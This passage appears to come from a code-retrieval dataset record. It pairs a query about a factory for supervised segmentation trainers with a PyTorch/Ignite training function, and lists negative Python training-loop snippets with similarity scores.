epochsdrawminmax, training=False)\n\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) <= self.args.updateThreshold:\n print('REJECTING NEW MODEL')\n filename = \"curent\"+str(i)+\"temp:iter\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n filenameBest = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n exists = os.path.isfile(filenameBest)\n if exists:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filenameBest)\n else:\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename=filename)\n\n else:\n print('ACCEPTING NEW MODEL')\n\n filename = \"best\" + str(self.args.numIters) + \":eps\" + str(self.args.numEps) + \":dim\" + str(\n self.game.n) + \".pth.tar\"\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=filename)\n self.mcts.clear()\n del self.mcts\n self.mcts = MCTS(self.game, self.nnet, self.args, mcts=True) # reset search tree\n print(self.tracker.print_diff())\n self.writeLogsToFile(epochswin, epochdraw, training=True)", "def _do_training(self, iteration, batch):\n\n feed_dict = self._get_feed_dict(iteration, batch)\n\n self._session.run(self._training_ops, feed_dict)\n\n if iteration % self._target_update_interval == 0:\n # Run target ops here.\n self._update_target()", "def 
run_epoch(session, model, eval_op=None, verbose=False, epoch_size=1):\n start_time = time.time()\n all_words = 0\n costs = 0.0\n predicts = []\n\n fetches = {\n \"cost\": model.cost,\n \"mask\": model.mask,\n \"predict\": model.predicts,\n \"seqlen\": model.seq_len,\n \"loss\": model.loss,\n \"label\": model.label,\n \"label_flat\": model.label_flat,\n \"not_space\": model.not_space\n }\n if eval_op is not None:\n fetches[\"eval_op\"] = eval_op\n # if debug:\n # fetches[\"inputs\"] = model.Dinputs\n # fetches[\"states\"] = model.Dstates\n # fetches[\"outputs\"] = model.Doutput\n\n logging.info(\"Epoch size: %d\" % epoch_size) \n print_idx = 0\n for step in range(epoch_size):\n vals = session.run(fetches)\n cost = vals[\"cost\"]\n mask = vals[\"mask\"]\n predict = vals[\"predict\"]\n label = vals[\"label\"]\n np.set_printoptions(threshold=np.nan)\n \n if eval_op is None:\n \n # if step > 497:\n # #for i in range(len(mask)):\n # # print(mask[i])\n # print(np.sum(mask, axis=1))\n # print(vals[\"seqlen\"])\n mask = np.array(np.round(mask), dtype=np.int32)\n shape = mask.shape\n # if step > 10 and step < 20:\n # print(predict)\n # print(np.argmax(predict, 1))\n predict = np.reshape(np.argmax(predict, 1), shape).tolist()\n mask = np.sum(mask, axis=1).tolist()\n for i in range(shape[0]):\n predicts.append(predict[i][:mask[i]])\n\n costs += cost\n words = np.sum(mask)\n all_words += words\n\n if epoch_size < 100:\n verbose = False\n\n if (step * 10 / epoch_size) > print_idx and eval_op is not None:\n print_idx = step * 10 / epoch_size + 1\n logging.info(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / step),\n num_gpus * all_words / (time.time() - start_time)))\n predict = np.argmax(predict, 1)\n label_flat = np.reshape(label, [-1])\n all_label_equal = np.equal(predict, label_flat)\n not_space_label = np.not_equal(label_flat, np.zeros(np.shape(label_flat)))\n not_space_equal = all_label_equal * not_space_label\n not_space_label_count = np.sum(not_space_label)\n not_space_equal_count = np.sum(not_space_equal)\n none_space_accuracy = not_space_equal_count / not_space_label_count\n logging.info(\"not space label: %d\" % not_space_label_count)\n logging.info(\"not space correct: %d\" % not_space_equal_count)\n logging.info(\"not space accuracy: %.3f\" % none_space_accuracy)\n logging.info(\"cost: %.3f\" % (costs / step))\n if np.isnan(np.exp(costs / step)):\n print(\"perplexity is nan\")\n print(\"cost: %f step: %d\" % (costs, step))\n return np.exp(costs / step)\n\n if eval_op is None:\n predict = np.reshape(predict, [-1])\n label_flat = np.reshape(label, [-1])\n all_label_equal = np.equal(predict, label_flat)\n not_space_label = np.not_equal(label_flat, np.zeros(np.shape(label_flat)))\n not_space_equal = all_label_equal * not_space_label\n not_space_label_count = np.sum(not_space_label)\n not_space_equal_count = np.sum(not_space_equal)\n none_space_accuracy = not_space_equal_count / not_space_label_count\n logging.info(\"not space label: %d\" % not_space_label_count)\n logging.info(\"not space correct: %d\" % not_space_equal_count)\n logging.info(\"not space accuracy: %.3f\" % none_space_accuracy)\n logging.info(\"cost: %.3f\" % (costs / step))\n return np.exp(costs / epoch_size), predicts\n # elif get_post:\n # # Keep in mind, when get_post, num_steps=1, batch_size=1\n # return np.exp(costs / iters), posteriors\n else:\n return np.exp(costs / epoch_size)", "def _train(self):\n step = 0\n for epoch in range(self.opts.num_epochs):\n self.hub.publish(Topic.EPOCH, 
epoch)\n for i, data in enumerate(self.loader):\n # Compute loss ...\n # NOTE(ycho): if one of the callbacks require training loss,\n # e.g. for logging, simply register a hook to the loss module\n # rather than trying to extract them here.\n loss = self.loss_fn(self.model, data)\n self.hub.publish(Topic.TRAIN_LOSS, loss)\n\n # Backprop + Optimize ...\n self.optim.zero_grad()\n loss[\"total\"].backward()\n self.optim.step()\n\n # Emit `step` event.\n # == logging, saving, evaluation\n self.hub.publish(Topic.STEP, step)\n step += 1\n\n if step >= self.opts.train_steps:\n return", "def train(self):\n self.emission_model(self.train_data)\n self.transition_model(self.train_data)", "def learn(self, num_episodes=10000):\n for i in range(num_episodes):\n self.actor()\n self.learner()", "def iteration(self, results):\n\n self.db.store_episodes_results(results)\n\n samples = self.db.iter_samples(self.args.q_sample_size,\n self.args.q_learning_iters)\n for sample in samples:\n a1 = self.q1_network.predict_argmax(sample.s2, self.args.batch_size)\n v1 = self.s.run(self.q2_values, {self.states: sample.s2,\n self.actions: a1})\n q1 = sample.r + (~sample.done * self.args.gamma * v1)\n\n a2 = self.q2_network.predict_argmax(sample.s2, self.args.batch_size)\n v2 = self.s.run(self.q1_values, {self.states: sample.s2,\n self.actions: a2})\n q2 = sample.r + (~sample.done * self.args.gamma * v2)\n \n feed_dict = {self.states: sample.s1, self.actions: sample.a}\n\n feed_dict[self.q_estimation] = q1\n self.q2_network.train_in_batches(self.q2_train_op, feed_dict,\n self.args.num_batches, self.args.batch_size)\n\n feed_dict[self.q_estimation] = q2\n self.q1_network.train_in_batches(self.q1_train_op, feed_dict,\n self.args.num_batches, self.args.batch_size)\n\n self.ed.next()", "def train(self):\n pass", "def train(self):\n pass", "def train(self):\n pass" ]
[ "0.6943727", "0.6593037", "0.6503868", "0.6496803", "0.64616853", "0.64566225", "0.64433736", "0.6342452", "0.6339075", "0.6338328", "0.6310606", "0.6282557", "0.62653345", "0.6262677", "0.6250832", "0.6228017", "0.6227637", "0.6218155", "0.6213814", "0.61772126", "0.6165034", "0.6147555", "0.6146779", "0.61331564", "0.613301", "0.61106074", "0.61097497", "0.61008435", "0.61002606", "0.6099648", "0.6087536", "0.6081396", "0.60694665", "0.6066621", "0.6057955", "0.6054285", "0.60092014", "0.59998065", "0.59991", "0.5991994", "0.5988084", "0.59839284", "0.59782755", "0.59759164", "0.59692204", "0.5934571", "0.59318477", "0.5926438", "0.59262127", "0.59228945", "0.59114397", "0.58981514", "0.58969826", "0.58914423", "0.5890575", "0.58893156", "0.5877285", "0.58756495", "0.58746415", "0.5874484", "0.5871121", "0.58696383", "0.5858361", "0.5855989", "0.58541316", "0.5852894", "0.5851739", "0.5851451", "0.5805467", "0.5802409", "0.5802322", "0.5800339", "0.5788158", "0.57872164", "0.5783741", "0.57830364", "0.57786924", "0.57766724", "0.5776564", "0.57729745", "0.57706213", "0.5769942", "0.57653147", "0.57617605", "0.57598937", "0.5757997", "0.5755782", "0.57475966", "0.57453686", "0.57415885", "0.57408696", "0.5738227", "0.5735892", "0.57316923", "0.5730202", "0.57270616", "0.57248664", "0.57214093", "0.57214093", "0.57214093" ]
0.7373323
0
Factory function for creating a trainer for supervised segmentation models.
def create_supervised_trainer( model, optimizer, loss_fn, prepare_batch, device=None, non_blocking=False, output_transform=lambda x, y, y_pred, loss: {"loss": loss.item()}, ): if device: model.to(device) def _update(engine, batch): model.train() optimizer.zero_grad() x, y, ids, patch_locations = prepare_batch(batch, device=device, non_blocking=non_blocking) y_pred = model(x) y_pred = _upscale_model_output(y_pred, y) loss = loss_fn(y_pred.squeeze(1), y.squeeze(1)) loss.backward() optimizer.step() return output_transform(x, y, y_pred, loss) return Engine(_update)
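A minimal usage sketch for the create_supervised_trainer factory in the document field above (assumptions: the returned object is a pytorch-ignite Engine, so Engine.run drives the loop; model, optimizer, loss_fn, prepare_batch, train_loader and max_epochs are illustrative placeholders, not part of the original sample):

    # Hypothetical call site; only the factory signature comes from the document above.
    trainer = create_supervised_trainer(
        model,          # a torch.nn.Module segmentation network
        optimizer,      # e.g. torch.optim.SGD(model.parameters(), lr=0.01)
        loss_fn,        # e.g. torch.nn.BCEWithLogitsLoss()
        prepare_batch,  # callable returning (x, y, ids, patch_locations)
        device="cuda",
    )
    # Engine.run is ignite's standard entry point for iterating a DataLoader.
    trainer.run(train_loader, max_epochs=10)

With the default output_transform, each iteration reports {"loss": loss.item()}, which downstream ignite handlers (loggers, progress bars) can consume.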
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, trainer):\n self.trainer = trainer", "def trainer_factory(\n algorithm: Algorithm, config_overrides: dict, env: Optional[str] = None\n) -> Trainer:\n ensure_moab_envs_register()\n trainer_cls = algorithm.get_trainer_cls()\n default_config = algorithm.get_default_config()\n return trainer_cls(config={**default_config, **config_overrides}, env=env)", "def create_trainer(session_name, # type: AnyStr\n save_dir, # type: AnyStr\n config, # type: thelper.typedefs.ConfigDict\n model, # type: thelper.typedefs.ModelType\n task, # type: thelper.tasks.Task\n loaders, # type: thelper.typedefs.MultiLoaderType\n ckptdata=None # type: Optional[thelper.typedefs.CheckpointContentType]\n ): # type: (...) -> thelper.train.Trainer\n assert \"trainer\" in config and config[\"trainer\"], \"session configuration dictionary missing 'trainer' section\"\n trainer_config = config[\"trainer\"]\n if \"type\" not in trainer_config:\n if isinstance(task, thelper.tasks.Classification):\n trainer_type = thelper.train.ImageClassifTrainer\n elif isinstance(task, thelper.tasks.Detection):\n trainer_type = thelper.train.ObjDetectTrainer\n elif isinstance(task, thelper.tasks.Regression):\n trainer_type = thelper.train.RegressionTrainer\n elif isinstance(task, thelper.tasks.Segmentation):\n trainer_type = thelper.train.ImageSegmTrainer\n else:\n raise AssertionError(f\"unknown trainer type required for task '{str(task)}'\")\n else:\n trainer_type = thelper.utils.import_class(trainer_config[\"type\"])\n return trainer_type(session_name, save_dir, model, task, loaders, config, ckptdata=ckptdata)", "def train(parser):\n cli_args = add_all_args(parser, TRAINING)\n if not cli_args.train_tfrecord and not cli_args.valid_tfrecord:\n assert (\n cli_args.relative_labels or cli_args.xml_labels_folder\n ), 'No labels provided: specify --relative-labels or --xml-labels-folder'\n if cli_args.augmentation_preset:\n assert (\n preset := cli_args.augmentation_preset\n ) in AUGMENTATION_PRESETS, f'Invalid augmentation preset {preset}'\n trainer = Trainer(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n classes_file=cli_args.classes,\n train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n image_folder=cli_args.image_folder,\n )\n trainer.train(\n epochs=cli_args.epochs,\n batch_size=cli_args.batch_size,\n learning_rate=cli_args.learning_rate,\n new_dataset_conf={\n 'dataset_name': (d_name := cli_args.dataset_name),\n 'relative_labels': cli_args.relative_labels,\n 'test_size': cli_args.test_size,\n 'voc_conf': cli_args.voc_conf,\n 'augmentation': bool((preset := cli_args.augmentation_preset)),\n 'sequences': AUGMENTATION_PRESETS.get(preset),\n 'aug_workers': cli_args.workers,\n 'aug_batch_size': cli_args.process_batch_size,\n },\n dataset_name=d_name,\n weights=cli_args.weights,\n evaluate=cli_args.evaluate,\n merge_evaluation=cli_args.merge_evaluation,\n evaluation_workers=cli_args.workers,\n shuffle_buffer=cli_args.shuffle_buffer,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n plot_stats=cli_args.plot_stats,\n save_figs=cli_args.save_figs,\n clear_outputs=cli_args.clear_output,\n n_epoch_eval=cli_args.n_eval,\n )", "def create_trainer(config: Config, device: torch.device, split: Split,\n own_split: bool) -> Tuple[Any, ...]:\n ret_type = Tuple[Tensor, Tensor, float]\n\n def output_transform(x: Tensor, y: Tensor,\n 
y_pred: Tensor, loss: Tensor) -> ret_type:\n \"\"\"What trainer returns to metrics at each step\"\"\"\n return y_pred, y, loss.item()\n\n model, optimizer_fn, criterion, checkpoint = config.model_config\n model = model.to(device)\n optimizer = optimizer_fn(model.parameters())\n if optimizer.__class__ in update_functions:\n update_function = update_functions[optimizer.__class__]\n update = update_function(model, optimizer, criterion, device,\n output_transform, prepare_batch)\n trainer = Engine(update)\n else:\n trainer = create_supervised_trainer(model, optimizer, criterion, device,\n prepare_batch=prepare_batch,\n output_transform=output_transform)\n if checkpoint is not None:\n info(f'Resume from {checkpoint}')\n obj = torch.load(str(checkpoint))\n model.load_state_dict(obj['model'])\n optimizer.load_state_dict(obj['optimizer'])\n trainer.load_state_dict(obj['trainer'])\n if not own_split:\n split = Split.load_state_dict(obj['split'])\n return model, optimizer, criterion, split, trainer", "def create_custom_supervised_trainer(model, optimizer, loss_fn, metrics={}, device=None, prepare_batch=None):\n\n def _update(engine, batch):\n model.train()\n optimizer.zero_grad()\n if not prepare_batch:\n x, y = _prepare_batch(batch, device=device)\n else:\n x, y = prepare_batch(batch, device=device)\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n loss.backward()\n optimizer.step()\n return loss.item(), y_pred, y\n\n def _metrics_transform(output):\n return output[1], output[2]\n\n engine = Engine(_update)\n\n for name, metric in metrics.items():\n metric._output_transform = _metrics_transform\n metric.attach(engine, name)\n\n return engine", "def build_trainer(\n name: str,\n *,\n default_config: Optional[TrainerConfigDict] = None,\n validate_config: Optional[Callable[[TrainerConfigDict], None]] = None,\n default_policy: Optional[Type[Policy]] = None,\n get_policy_class: Optional[Callable[[TrainerConfigDict], Optional[Type[\n Policy]]]] = None,\n validate_env: Optional[Callable[[EnvType, EnvContext], None]] = None,\n before_init: Optional[Callable[[Trainer], None]] = None,\n after_init: Optional[Callable[[Trainer], None]] = None,\n before_evaluate_fn: Optional[Callable[[Trainer], None]] = None,\n mixins: Optional[List[type]] = None,\n execution_plan: Optional[Callable[[\n WorkerSet, TrainerConfigDict\n ], Iterable[ResultDict]]] = default_execution_plan) -> Type[Trainer]:\n\n original_kwargs = locals().copy()\n base = add_mixins(Trainer, mixins)\n\n class trainer_cls(base):\n _name = name\n _default_config = default_config or COMMON_CONFIG\n _policy_class = default_policy\n\n def __init__(self, config=None, env=None, logger_creator=None):\n Trainer.__init__(self, config, env, logger_creator)\n\n def _init(self, config: TrainerConfigDict,\n env_creator: Callable[[EnvConfigDict], EnvType]):\n # Validate config via custom validation function.\n if validate_config:\n validate_config(config)\n\n # No `get_policy_class` function.\n if get_policy_class is None:\n # Default_policy must be provided (unless in multi-agent mode,\n # where each policy can have its own default policy class.\n if not config[\"multiagent\"][\"policies\"]:\n assert default_policy is not None\n self._policy_class = default_policy\n # Query the function for a class to use.\n else:\n self._policy_class = get_policy_class(config)\n # If None returned, use default policy (must be provided).\n if self._policy_class is None:\n assert default_policy is not None\n self._policy_class = default_policy\n\n if before_init:\n 
before_init(self)\n\n # Creating all workers (excluding evaluation workers).\n self.workers = self._make_workers(\n env_creator=env_creator,\n validate_env=validate_env,\n policy_class=self._policy_class,\n config=config,\n num_workers=self.config[\"num_workers\"])\n self.execution_plan = execution_plan\n self.train_exec_impl = execution_plan(self.workers, config)\n\n if after_init:\n after_init(self)\n\n @override(Trainer)\n def step(self):\n res = next(self.train_exec_impl)\n return res\n\n @override(Trainer)\n def _before_evaluate(self):\n if before_evaluate_fn:\n before_evaluate_fn(self)\n\n @override(Trainer)\n def __getstate__(self):\n state = Trainer.__getstate__(self)\n state[\"train_exec_impl\"] = (\n self.train_exec_impl.shared_metrics.get().save())\n return state\n\n @override(Trainer)\n def __setstate__(self, state):\n Trainer.__setstate__(self, state)\n self.train_exec_impl.shared_metrics.get().restore(\n state[\"train_exec_impl\"])\n\n @staticmethod\n @override(Trainer)\n def with_updates(**overrides) -> Type[Trainer]:\n \"\"\"Build a copy of this trainer class with the specified overrides.\n\n Keyword Args:\n overrides (dict): use this to override any of the arguments\n originally passed to build_trainer() for this policy.\n\n Returns:\n Type[Trainer]: A the Trainer sub-class using `original_kwargs`\n and `overrides`.\n\n Examples:\n >>> MyClass = SomeOtherClass.with_updates({\"name\": \"Mine\"})\n >>> issubclass(MyClass, SomeOtherClass)\n ... False\n >>> issubclass(MyClass, Trainer)\n ... True\n \"\"\"\n return build_trainer(**dict(original_kwargs, **overrides))\n\n trainer_cls.__name__ = name\n trainer_cls.__qualname__ = name\n return trainer_cls", "def __init__(self, model_name='vgg16'):\n trainer = Trainer(model_name=model_name)\n self.model = trainer.model\n self.model_save_dir = trainer.model_save_dir\n self.model_name = model_name", "def build_trainer(restore_state=None, train_policies=None, config=None):\n \n print(\"Using config\")\n print(config)\n cls = PPOTrainer\n trainer = cls(config=config)\n env = trainer.workers.local_worker().env\n if restore_state is not None:\n trainer.restore_from_object(restore_state)\n return trainer", "def setup_trainer(model, train_dir, train_loader, val_loader,\n property_map, exclude=[]):\n hooks = build_hooks(train_dir=train_dir, property_map=property_map)\n\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n trainable_params = filter(lambda p: p not in exclude, trainable_params)\n\n optim = build_optimizer(trainable_params=trainable_params)\n loss_fn = build_loss(property_map=property_map)\n trainer = Trainer(train_dir, model, loss_fn, optim, train_loader,\n val_loader, hooks=hooks)\n return trainer", "def train_model(table, tree_prior, config):\n assert isinstance(table, Table)\n M = config['model_num_clusters']\n D = config['model_latent_dim']\n assert M >= 1\n assert D >= 0\n if D == 0:\n Trainer = TreeCatTrainer\n elif M == 1:\n Trainer = TreeGaussTrainer\n else:\n Trainer = TreeMogTrainer\n return Trainer(table, tree_prior, config).train()", "def train(self, *args, **kwargs):\n raise NotImplementedError", "def train(self):\n model = TreeTrainer.train(self)\n model['latent'] = self._latent\n model['suffstats'] = {\n 'vert_ss': self._vert_ss,\n 'edge_ss': self._edge_ss,\n 'feat_ss': self._feat_ss,\n }\n return model", "def _setup_training(self, params, **kwargs):\n model_params = params.permute_training_on_top().model\n\n model_kwargs = {**model_params.fixed, **model_params.variable}\n\n model = 
self.model_cls(**model_kwargs)\n\n training_params = params.permute_training_on_top().training\n losses = training_params.nested_get(\"losses\")\n optimizer_cls = training_params.nested_get(\"optimizer_cls\")\n optimizer_params = training_params.nested_get(\"optimizer_params\")\n train_metrics = training_params.nested_get(\"train_metrics\", {})\n lr_scheduler_cls = training_params.nested_get(\"lr_sched_cls\", None)\n lr_scheduler_params = training_params.nested_get(\"lr_sched_params\",\n {})\n val_metrics = training_params.nested_get(\"val_metrics\", {})\n\n # necessary for resuming training from a given path\n save_path = kwargs.pop(\"save_path\", os.path.join(\n self.save_path,\n \"checkpoints\",\n \"run_%02d\" % self._run))\n\n return self.trainer_cls(\n network=model,\n save_path=save_path,\n losses=losses,\n key_mapping=self.key_mapping,\n optimizer_cls=optimizer_cls,\n optimizer_params=optimizer_params,\n train_metrics=train_metrics,\n val_metrics=val_metrics,\n lr_scheduler_cls=lr_scheduler_cls,\n lr_scheduler_params=lr_scheduler_params,\n optim_fn=self._optim_builder,\n save_freq=self.checkpoint_freq,\n **kwargs\n )", "def build_trainer(cfg, hparams):\n name = cfg.trainer.name\n return TRAINER_REGISTRY.get(name)(cfg, hparams)", "def wrapper_train(tree_depth, demos, validation_demos, pred_data=[None,None], verbose=True):\n return train(program_gen_step_size = 1000, \n num_programs = NUM_PROGRAMS, \n num_dts = 5, \n max_num_particles = 25, \n input_demos = demos, \n further_demos = validation_demos, \n tree_depth = tree_depth, \n return_prior=True,\n pred_data=pred_data,\n verbose=verbose)", "def setup(self, trainer: \"pl.Trainer\") -> None:\n trainer_fn = trainer.state.fn\n if trainer_fn == TrainerFn.FITTING:\n super().setup(trainer)\n else:\n assert self.accelerator is not None\n self.accelerator.setup(trainer)\n\n # move the model to the correct device\n self.model_to_device()\n self.setup_precision_plugin()\n assert self.model is not None", "def train_model(args, train_exs: List[SentimentExample]) -> SentimentClassifier:\n # Initialize feature extractor\n nltk.download('stopwords')\n stop_words = set(stopwords.words('english'))\n\n if args.model == \"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n feat_extractor = UnigramFeatureExtractor(Indexer(), train_exs, stop_words)\n elif args.feats == \"BIGRAM\":\n # Add additional preprocessing code here\n feat_extractor = BigramFeatureExtractor(Indexer(), train_exs, stop_words)\n elif args.feats == \"BETTER\":\n # Add additional preprocessing code here\n feat_extractor = BetterFeatureExtractor(Indexer(), train_exs, stop_words)\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = train_perceptron(train_exs, feat_extractor)\n elif args.model == \"LR\":\n model = train_logistic_regression(train_exs, feat_extractor)\n else:\n raise Exception(\"Pass in TRIVIAL, PERCEPTRON, or LR to run the appropriate system\")\n return model", "def main(args):\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)", "def build_model(cls, args):\n 
base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def build_task_trainer(unfixed_params):\n logdir = unfixed_params['logdir']\n gpu_ids_abs = unfixed_params[\"gpu_ids_abs\"]\n depth = unfixed_params[\"depth\"]\n lr = unfixed_params[\"lr\"]\n\n batch_size = 32\n opt_name = \"RMSprop\"\n lr_decay = 0.94\n decay_position= 1\n position_type = \"epoch\"\n weight_decay = 2e-5\n momentum = 0\n nepochs = 100\n num_class = 10\n torch.backends.cudnn.benchmark = True\n mnist = FashionMNIST(root=\"datasets/fashion_data\", batch_size=batch_size, num_workers=2)\n net = Model(SimpleModel(depth), gpu_ids_abs=gpu_ids_abs, init_method=\"kaiming\", verbose=False)\n opt = Optimizer(net.parameters(), opt_name, lr_decay, decay_position, position_type=position_type,\n lr=lr, weight_decay=weight_decay, momentum=momentum)\n Trainer = FashionClassTrainer(logdir, nepochs, gpu_ids_abs, net, opt, mnist, num_class)\n return Trainer", "def stft():\n trainer = {\n 'model': {\n 'encoder': {\n 'factory': 'padertorch.contrib.examples.source_separation.tasnet.tas_coders.StftEncoder'\n },\n 'decoder': {\n 'factory': 'padertorch.contrib.examples.source_separation.tasnet.tas_coders.IstftDecoder'\n },\n }\n }", "def on_start_(\n self,\n super_callback: \"AllennlpWandbCallback\",\n trainer: \"GradientDescentTrainer\",\n is_primary: bool = True,\n **kwargs: Any,\n ) -> None:\n self.trainer = trainer", "def train_main(cls):\n launcher = cls()\n launcher.launch()", "def train(self):\n\t\traise NotImplementedError", "def train(self, train_loader):\n pass", "def _init_trainer(self, params = None, **kwargs):\n self.trainer = QTreeTrainer(self, params = params, **kwargs)", "def with_updates(**overrides) -> Type[Trainer]:\n return build_trainer(**dict(original_kwargs, **overrides))", "def train():\n pass", "def create_trainer(criterion, denominator):\n variables = re.split(\",|\\|\", denominator)\n variables.sort()\n\n assert(set(variables) == set(criterion.variables()))\n\n # Allocate the batch-feeder based on the specified random variables.\n def feeder(batch, criterion, accelerator):\n dictionary = {}\n for index, key in enumerate(variables):\n dictionary[key] = batch[index].to(accelerator, non_blocking=True)\n\n return criterion(**dictionary)\n\n # Create the trainer object with the desired criterion.\n class Trainer(BaseAmortizedRatioEstimatorTrainer):\n\n def __init__(self,\n estimator,\n optimizer,\n dataset_train,\n criterion,\n accelerator=hypothesis.accelerator,\n batch_size=hypothesis.default.batch_size,\n checkpoint=None,\n dataset_test=None,\n epochs=hypothesis.default.epochs,\n lr_scheduler=None,\n identifier=None,\n shuffle=True,\n workers=hypothesis.default.dataloader_workers):\n super(Trainer, self).__init__(\n accelerator=accelerator,\n batch_size=batch_size,\n checkpoint=checkpoint,\n criterion=criterion,\n dataset_test=dataset_test,\n dataset_train=dataset_train,\n epochs=epochs,\n estimator=estimator,\n feeder=feeder,\n identifier=identifier,\n lr_scheduler_epoch=lr_scheduler,\n optimizer=optimizer,\n shuffle=shuffle,\n workers=workers)\n\n return Trainer", "def initialize(self, training=True, force_load_plans=False, num_epochs=500, prev_trainer=None):\n # -- The Trainer embodies the actual model that will be used as foundation to continue training on -- #\n # -- It should be already initialized since the output_folder will be used. If it is None, the model will be initialized and trained. 
-- #\n # -- Further the trainer needs to be of class nnUNetTrainerV2 or nnUNetTrainerMultiHead for this method, nothing else. -- #\n # -- Set prev_trainer correctly as class instance and not a string -- #\n self.trainer = prev_trainer\n\n # -- Set nr_epochs to provided number -- #\n self.max_num_epochs = num_epochs\n\n # -- Initialize the trained_on_tasks and load trained_on_folds -- #\n trained_on_tasks = list()\n trained_on_folds = self.already_trained_on.get(str(self.fold), list())\n \n # -- Reset the trained_on_tasks if the trained_on_folds exist for the current fold -- #\n if isinstance(trained_on_folds, dict):\n trained_on_tasks = trained_on_folds.get('finished_training_on', list())\n\n # -- The new_trainer indicates if the model is a new multi head model, -- #\n # -- ie. if it has been trained on only one task so far (True) or on more than one (False) -- #\n if len(trained_on_tasks) > 1:\n self.new_trainer = False\n else:\n self.new_trainer = True\n \n super().initialize(training, force_load_plans) # --> This updates the corresponding variables automatically since we inherit this class", "def train(self):\n model = TreeTrainer.train(self)\n model['assignments'] = self._assignments\n model['suffstats'] = {\n 'ragged_index': self._table.ragged_index,\n 'vert_ss': self._vert_ss,\n 'edge_ss': self._edge_ss,\n 'feat_ss': self._feat_ss,\n 'meas_ss': self._meas_ss,\n }\n return model", "def train( # type: ignore\n self,\n pl_trainer_args: Dict[str, Any],\n model_args: Dict[str, Union[float, str, int]],\n dataset_args: Dict[str, Union[float, str, int]],\n dataset: GFlowNetDataset,\n environment: GraphBuildingEnv,\n context: GraphBuildingEnvContext,\n task: GFlowNetTask,\n ) -> None:\n\n logger.info(f\"Trainer arguments: {pl_trainer_args}\")\n\n if pl_trainer_args[\n \"resume_from_checkpoint\"\n ] is not None and not pl_trainer_args[\"resume_from_checkpoint\"].endswith(\n \".ckpt\"\n ):\n pl_trainer_args[\"resume_from_checkpoint\"] = None\n\n pl_trainer_args[\"callbacks\"] = {\n \"model_checkpoint_callback\": {\"save_top_k\": pl_trainer_args[\"save_top_k\"]}\n }\n\n pl_trainer_args[\"callbacks\"] = self.add_callbacks(pl_trainer_args[\"callbacks\"])\n\n pl_trainer_args[\"logger\"] = TensorBoardLogger(\n pl_trainer_args[\"save_dir\"], name=pl_trainer_args[\"basename\"]\n )\n\n trainer = Trainer(\n profiler=pl_trainer_args[\"profiler\"],\n logger=pl_trainer_args[\"logger\"],\n log_every_n_steps=pl_trainer_args[\"trainer_log_every_n_steps\"],\n callbacks=pl_trainer_args[\"callbacks\"],\n max_epochs=pl_trainer_args[\"epochs\"],\n strategy=pl_trainer_args[\"strategy\"],\n fast_dev_run=pl_trainer_args[\"development_mode\"],\n )\n\n data_module, model_module = self.get_data_and_model_modules(\n model_args,\n dataset_args,\n pl_trainer_args,\n dataset,\n environment,\n context,\n task,\n )\n trainer.fit(model_module, data_module)", "def train(self, ):\n raise NotImplementedError", "def train(self):\n raise NotImplementedError", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def train(self):\n raise NotImplementedError()", "def train_model(args, train_exs: List[SentimentExample]) -> SentimentClassifier:\n indexer = Indexer()\n stop_words = set(stopwords.words('english'))\n punkt = (',', '.', '...', '?', '\\'', '\\'\\'', '!', ':', ';')\n # Initialize feature extractor\n if args.model == 
\"TRIVIAL\":\n feat_extractor = None\n elif args.feats == \"UNIGRAM\":\n # Generate vocabulary\n for ex in train_exs:\n for word in ex.words:\n if word.lower() not in stop_words and word.lower() not in punkt:\n indexer.add_and_get_index(word.lower())\n feat_extractor = UnigramFeatureExtractor(indexer)\n elif args.feats == \"BIGRAM\":\n # Generate vocabulary\n for ex in train_exs:\n for i in range(0, len(ex.words) - 1):\n if stop_words.__contains__(ex.words[i]) and stop_words.__contains__(ex.words[i + 1]) or (\n punkt.__contains__(ex.words[i]) or punkt.__contains__(ex.words[i + 1])):\n continue\n bigram = ex.words[i] + ' ' + ex.words[i + 1]\n indexer.add_and_get_index(bigram.lower())\n feat_extractor = BigramFeatureExtractor(indexer)\n elif args.feats == \"BETTER\":\n # Generate vocabulary\n cnt = Counter()\n for ex in train_exs:\n cnt.update(\n word.lower() for word in ex.words if word.lower() not in stop_words and word.lower() not in punkt)\n cnt = dict(cnt.most_common(int(cnt.__len__() * 0.75)))\n for keys in cnt.keys():\n indexer.add_and_get_index(keys)\n feat_extractor = BetterFeatureExtractor(indexer)\n else:\n raise Exception(\"Pass in UNIGRAM, BIGRAM, or BETTER to run the appropriate system\")\n\n # Train the model\n if args.model == \"TRIVIAL\":\n model = TrivialSentimentClassifier()\n elif args.model == \"PERCEPTRON\":\n model = 